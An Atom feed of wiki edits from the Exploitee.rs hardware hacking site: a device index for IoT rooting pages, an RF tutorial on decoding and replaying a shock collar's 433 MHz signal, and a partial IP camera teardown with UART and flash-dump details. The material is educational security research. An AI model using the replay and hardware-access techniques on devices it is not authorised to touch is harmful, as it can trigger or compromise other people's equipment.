https://www.Exploitee.rs/api.php?action=feedcontributions&user=Rjmendez&feedformat=atomExploitee.rs - User contributions [en]2024-03-28T08:44:03ZUser contributionsMediaWiki 1.37.2https://www.Exploitee.rs/index.php?title=File:Collar_protocol_packet.PNG&diff=2978File:Collar protocol packet.PNG2018-08-21T03:28:50Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Collar protocol packet.PNG&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=Main_Page/Devices&diff=2938Main Page/Devices2017-12-12T17:45:48Z<p>Rjmendez: </p>
<hr />
<div>{| style="border: 0px solid #000000; cell-padding:0px; cell-spacing:0px;"<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''INTERNET OF THINGS'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''BLU-RAY PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Sony-bdp-s5100-multi-region-blu-ray-dvd-player.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony BDP-S5100'''<br />
*[[Sony BDP-S5100]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:LG_BP350.JPG|130px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LG Blu-Ray'''<br />
*[[LG BP350]]<br />
*[[LG BP530]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Panasonic-DMP-BDT230.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Panasonic Blu-Ray'''<br />
*[[DMP-BDT230]]<br />
*[[DMP-BD871]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''CAMERAS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Alarm.com_ADC-v520IR.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Alarm.com v520IR'''<br />
*[[Alarm.com ADC-v520IR]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:DLINK_936L.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''DLink 936L'''<br />
*[[DLink 936L]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Cloudipcam_store.png|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LeFun Cloud IPCam'''<br />
*[[LeFun Cloud IPCam]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Ring-doorbell.jpg|35px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Ring Doorbell'''<br />
*[[Ring Doorbell]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Samsung-SDR3102N.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung SDR-3102N'''<br />
*[[Samsung SDR-3102N]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Samsung-smartcam.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung SmartCam'''<br />
*[[Samsung SmartCam]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Summer_Baby_Zoom_WiFi.jpg|75px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Summer Baby Zoom WiFi'''<br />
*[[Summer Baby Zoom WiFi]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Zmodo greet.JPG|35px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Zmodo Greet'''<br />
*[[Zmodo Greet]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''HOME AUTOMATION'''<br />
| style="border-top: 0px solid #000000;"|[[File:BelkinWemo.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Belkin Wemo'''<br />
*[[Belkin Wemo]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:GreenwaveRealityTCPConnectedHub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Greenwave Reality Bulbs'''<br />
*[[Greenwave Reality Bulbs]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Lutron LBDG2WH Caseta Smart Home Stock.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Lutron L-BDG2-WH Caseta Smart Bridge '''<br />
*[[Lutron L-BDG2-WH Caseta Smart Bridge]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Staples_Connect_Hub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Staples Connect Hub'''<br />
*[[Staples Connect Hub]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:WinkHub.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Wink Hub'''<br />
*[[Wink Hub]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MEDIA PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:FireTVStickStockPhoto.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon Fire TV Stick'''<br />
*[[Amazon Fire TV Stick]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:AmazonFireTV.jpg|100px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon FireTV'''<br />
*[[Amazon FireTV]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:VizioCoStarLT.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio CoStar LT (ISV-B11)'''<br />
*[[Vizio CoStar LT (ISV-B11)]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:NetgearPush2TV.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear Push2TV (PTV3000)'''<br />
*[[Netgear Push2TV (PTV3000)]]<br />
|}<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;" valign="top"<br />
|+'''INTERNET OF THINGS (Cont)'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
| style="border-top: 0px solid #000000;"|[[File:NetgearNeoTV.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear NTV200-100NAS'''<br />
*[[Netgear NTV200-100NAS]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Front-SMALL.jpg|100px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Boxee Box'''<br />
*[[Boxee]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Chromecast-stock.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google Chromecast'''<br />
*[[Google Chromecast]] <br />
*[http://forum.exploitee.rs/google-chromecast-f48 Chromecast forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Roku-pile.jpg|100px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Roku Streaming Players'''<br />
*[[Roku]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Allsharecast.jpg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Samsung Allshare Cast'''<br />
*[[Samsung Allshare Cast]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Steam_Link_Stock.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Steam Link'''<br />
*[[Steam Link]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Vudu Spark Stock Photo.jpeg|70px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vudu Spark'''<br />
*[[Vudu Spark]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MOBILE'''<br />
| style="border-top: 0px solid #000000;"|[[File:Razr.png|40px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Moto LTE RAZR, BIONIC, & DROID 4'''<br />
*[[Moto RAZR, BIONIC, DROID 4]]<br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''MUSIC PLAYERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:ALURATEK_WIFI_RADIO.JPG|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Aluratek WiFi Radio'''<br />
*[[Aluratek WiFi Radio]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Amazon Tap Stock Photo.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Amazon Tap'''<br />
*[[Amazon Tap]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''NETWORK ATTACHED STORAGE'''<br />
| style="border-top: 0px solid #000000;"|[[File:ConnectedDataFileTransporter.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Connected Data Transporter'''<br />
*[[Connected Data Transporter]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Pogoplug-mobile.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''PogoPlug Mobile'''<br />
*[[PogoPlug Mobile]]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Qnap TS131.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''QNAP TurboStation'''<br />
*[[QNAP TS-131]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Wd_stock_photo.jpg|60px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Western Digital MyCloud'''<br />
*[[Western Digital MyCloud]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''PRINTERS'''<br />
| style="border-top: 0px solid #000000;"|[[File:EpsonArtisan700.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Epson Artisan 700/800'''<br />
*[[Epson Artisan 700/800]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''REFRIGERATOR'''<br />
| style="border-top: 0px solid #000000;"|[[File:LFX31995ST.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''LG Smart Refrigerator (LFX31995ST)'''<br />
*[[LG Smart Refrigerator (LFX31995ST)]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''TELEVISIONS'''<br />
| style="border-top: 0px solid #000000;"|[[File:HisenseAndroidTV.jpg|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Hisense Android TV'''<br />
*[[Hisense Android TV]] <br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Vizio_SmartTV_VF553XVT.png|80px|center]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio Smart TV (VF553XVT)'''<br />
*[[Vizio Smart TV (VF553XVT)]] <br />
|}<br />
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''THERMOSTATS'''<br />
| style="border-top: 0px solid #000000;"|[[File:Nest.jpg|80px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google Nest'''<br />
*[[Nest]] <br />
*[http://forum.exploitee.rs/google-nest-f50/ Google Nest Forum ]<br />
*[[Exploiting Nest Thermostats]]<br />
|}<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''INTERNET OF THINGS (Cont)'''<br />
| valign="top"|<br />
{| style="border: 0px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+ style="text-align: left; padding-left:15px;"|'''VOIP'''<br />
| style="border-top: 0px solid #000000;"|[[File:Ooma_Telo.jpg|80px]] <br />
| valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Ooma Telo'''<br />
*[[Ooma Telo]] <br />
|}<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Medical'''<br />
| style="border-top: 0px solid #000000;"| [[File:Merlin-at-home-1.jpg|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''SJM Merlin at Home'''<br />
*[[SJM Merlin at Home]]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Networking'''<br />
| style="border-top: 0px solid #000000;"| [[File:BELKIN_N300.JPG|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Belkin N300'''<br />
*[[Belkin N300]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:Google_OnHub.jpg|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google (TP-Link)'''<br />
*[[Google OnHub (TP-Link)]]<br />
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:ASUS-Google-OnHub.jpg|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Google (ASUS)'''<br />
*[[Asus OnHub]]<br />
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:LINKSYS_WRT1200AC.JPG|75px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Linksys WRT1200AC'''<br />
*[[Linksys WRT1200AC]]<br />
|-<br />
| style="border-top: 0px solid #000000;"| [[File:NETGEAR_WN3000RP.JPG|50px|center]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear WN3000RP'''<br />
*[[Netgear WN3000RP]]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"<br />
|+'''Android TV'''<br />
| style="border-top: 0px solid #000000;"| [[File:Android_TV.jpg|100px]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''ADT-1'''<br />
*[[ADT-1 Android TV]]<br />
*[https://forum.exploitee.rs/adt-f52/ ADT-1 Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Google-Nexus-Player-Stock.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Nexus Player'''<br />
*[[Google Nexus Player]] <br />
*[https://forum.exploitee.rs/nexus-player-f54/ Google Nexus Player Forum ]<br />
|}<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px;" valign="top"<br />
|+'''SECOND GENERATION GOOGLETV'''<br />
| style="border-top: 0px solid #000000;"|[[File:Asus_cube.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Asus Cube'''<br />
*[[Asus Cube]] <br />
*[http://forum.exploitee.rs/cube-f46/ Asus Cube Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Neotv-prime.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Netgear NeoTV Prime'''<br />
*[[Netgear NeoTV Prime]] <br />
*[http://forum.exploitee.rs/neotv-prime-gtv100-f44/ Negear NeoTV Prime Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Hisense pulse stock.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Hisense Pulse'''<br />
*[[Hisense Pulse]] <br />
*[http://forum.exploitee.rs/pulse-gx1200v-f42/ Hisense Pulse Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:180px-NSZ-GS7.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony NSZ-GS7'''<br />
*[[Sony NSZ-GS7 (Streamer)]] <br />
*[http://forum.exploitee.rs/nsz-gs7-streamer/ NSZ-GS7 Forum ]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:Costar01.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Vizio Co-Star'''<br />
*[[Vizio Co-Star]] <br />
*[http://forum.exploitee.rs/star-vap430-f40/ Co-Star Forum ]<br />
|-<br />
| [[File:180px-LG_G2.jpg|150px]]<br />
| colspan="2" valign="top" style="text-align: left;"|<br />
'''LG 47G2/55G2'''<br />
*[[LG 47G2/55G2 (Internet TV)]] <br />
*[http://forum.exploitee.rs/47g2-55g2-internet-f36/ LG devices forum ]<br />
|}<br />
| valign="top"|<br />
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px"<br />
|+'''FIRST GENERATION GOOGLETV'''<br />
| style="border-top: 0px solid #000000;"| [[File:180px-revue.jpg|100px]]<br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Logitech Revue'''<br />
*[[Revue software root]]<br />
*[[Logitech Revue UART root]]<br />
*[http://forum.exploitee.rs/revue/ Revue forum ]<br />
*[http://exploitee.rs/index.php/Category:Logitech_Revue Info on Logitech Revue]<br />
|-<br />
| style="border-top: 0px solid #000000;"|[[File:180px-Sony_NSZ_GT1_NSX_40GT1.jpg|100px]] <br />
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|<br />
'''Sony NSZ-GT1'''<br />
*[[Sony NSZ-GT1 (Bluray Player)]] <br />
*[http://forum.exploitee.rs/nsz-gt1/ NSZ-GT1 Forum ]<br />
'''Sony NSX-##GT1'''<br />
*[[Sony NSX-40GT1 (Internet TV)]]<br />
*[http://forum.exploitee.rs/nsx-40gt1/ NSX-40GT1 Forum ]<br />
''' Sony Generic'''<br />
*[[Sony Bootloader HW Root]]<br />
*[[Sony Unsigned Kernels (SW Root)]]<br />
*[[Sony SATA HW Root]]<br />
*[[I've rooted... now what?!]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Exploitee.rs Hardware'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[[Exploitee.rs Low Voltage e-MMC Adapter]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Generic Info'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[[All_device_feature_matrix|All Device Feature Matrix]]<br />
*[[Exploiting Key Signing for Root]]<br />
*[[Installing Custom Recovery (Gen 2 Only)]]<br />
*[[RF_Signal_Analysis|RF Signal Analysis]]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Presentation Slides'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON20.pdf DEF CON 20 - "Hacking The Google TV"]<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON21.pdf DEF CON 21 - "Google TV Or: How I Learned to Stop Worrying and Exploit Secure Boot"]<br />
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON22.pdf DEF CON 22 - "Hack All The Things: 20 Devices in 45 Minutes"]<br />
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader.pdf BlackHat 2017 - "Hacking Hardware with a $10 SD Card Reader"]<br />
*[https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf DEFCON 25 - "All Your Things Are Belong To Us"]<br />
|}<br />
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"<br />
|+'''Whitepapers'''<br />
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|<br />
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader-wp.pdf "Hacking Hardware with a $10 SD Card Reader"]<br />
|}<br />
|}</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2928RF Signal Analysis2017-10-18T20:50:12Z<p>Rjmendez: /* Sending our own data */</p>
<hr />
<div>This page will be to cover some basic RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.<br />
<br />
The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.<br />
<br />
[[File:URH_NRZ_replace.png|500px]]<br />
<br />
The resulting packets now look like this.<br />
<br />
[[File:Decoded_packets.png]]<br />
<br />
If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.<br />
<br />
[[File:Collar_protocol_packet.PNG|500px]]<br />
<br />
== Sending our own data ==<br />
<br />
With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here. https://github.com/rjmendez/ShockCollar</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=LeFun_Cloud_IPCam&diff=2873LeFun Cloud IPCam2017-08-09T19:22:22Z<p>Rjmendez: </p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Cloudipcam_store.png|100px|left|thumb]]<br />
[[Category:Cameras]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.<br />
<br />
== About ==<br />
The LeFun C1 wireless surveillance camera is a network (Wifi/Ethernet) camera w/ IR LEDs provided by LeFun and available on Amazon.com.<br />
<br />
<gallery><br />
File:Cloudipcam_front.jpg<br />
File:Cloudipcam_profile.jpg<br />
File:Cloudipcam_back.jpg<br />
</gallery><br />
<br />
== Disassembly ==<br />
The base of the camera is attached with four small phillips screws hidden under silicone rubber feet. Remove all four, the base and board should be open to you.<br />
<br />
<gallery><br />
File:Cloudipcam_bottom.jpg<br />
File:Cloudipcam_board.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 38400 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Cloudipcam_UART_pins.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
U-Boot is available on boot and can probably be init hijacked, thankfully there is a better option that does not require access to the internals.<br />
<br />
[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]<br />
<br />
The firmware on this model was not available for download elsewhere and I didn't feel like waiting on the firmware to download over the uart at 38.4k baud so we will resort to the hot air and minipro TL866CS. SPI flash model mxic25l12835f was removed and dumped, the issue I had was that from 0x0 to 0xC00000 every 4 bytes were swapped.<br />
<br />
'''Firmware Format'''<br />
<br />
Raw data from the chip has an interesting patern to it.<br />
<br />
From U-Boot<br />
<br />
<pre>=> md.b 0x02000000 130<br />
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........<br />
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................<br />
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................<br />
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.<br />
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......<br />
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....<br />
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre><br />
<br />
Dumped from the chip.<br />
<br />
<pre>rjmendez@Rjmendez:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15<br />
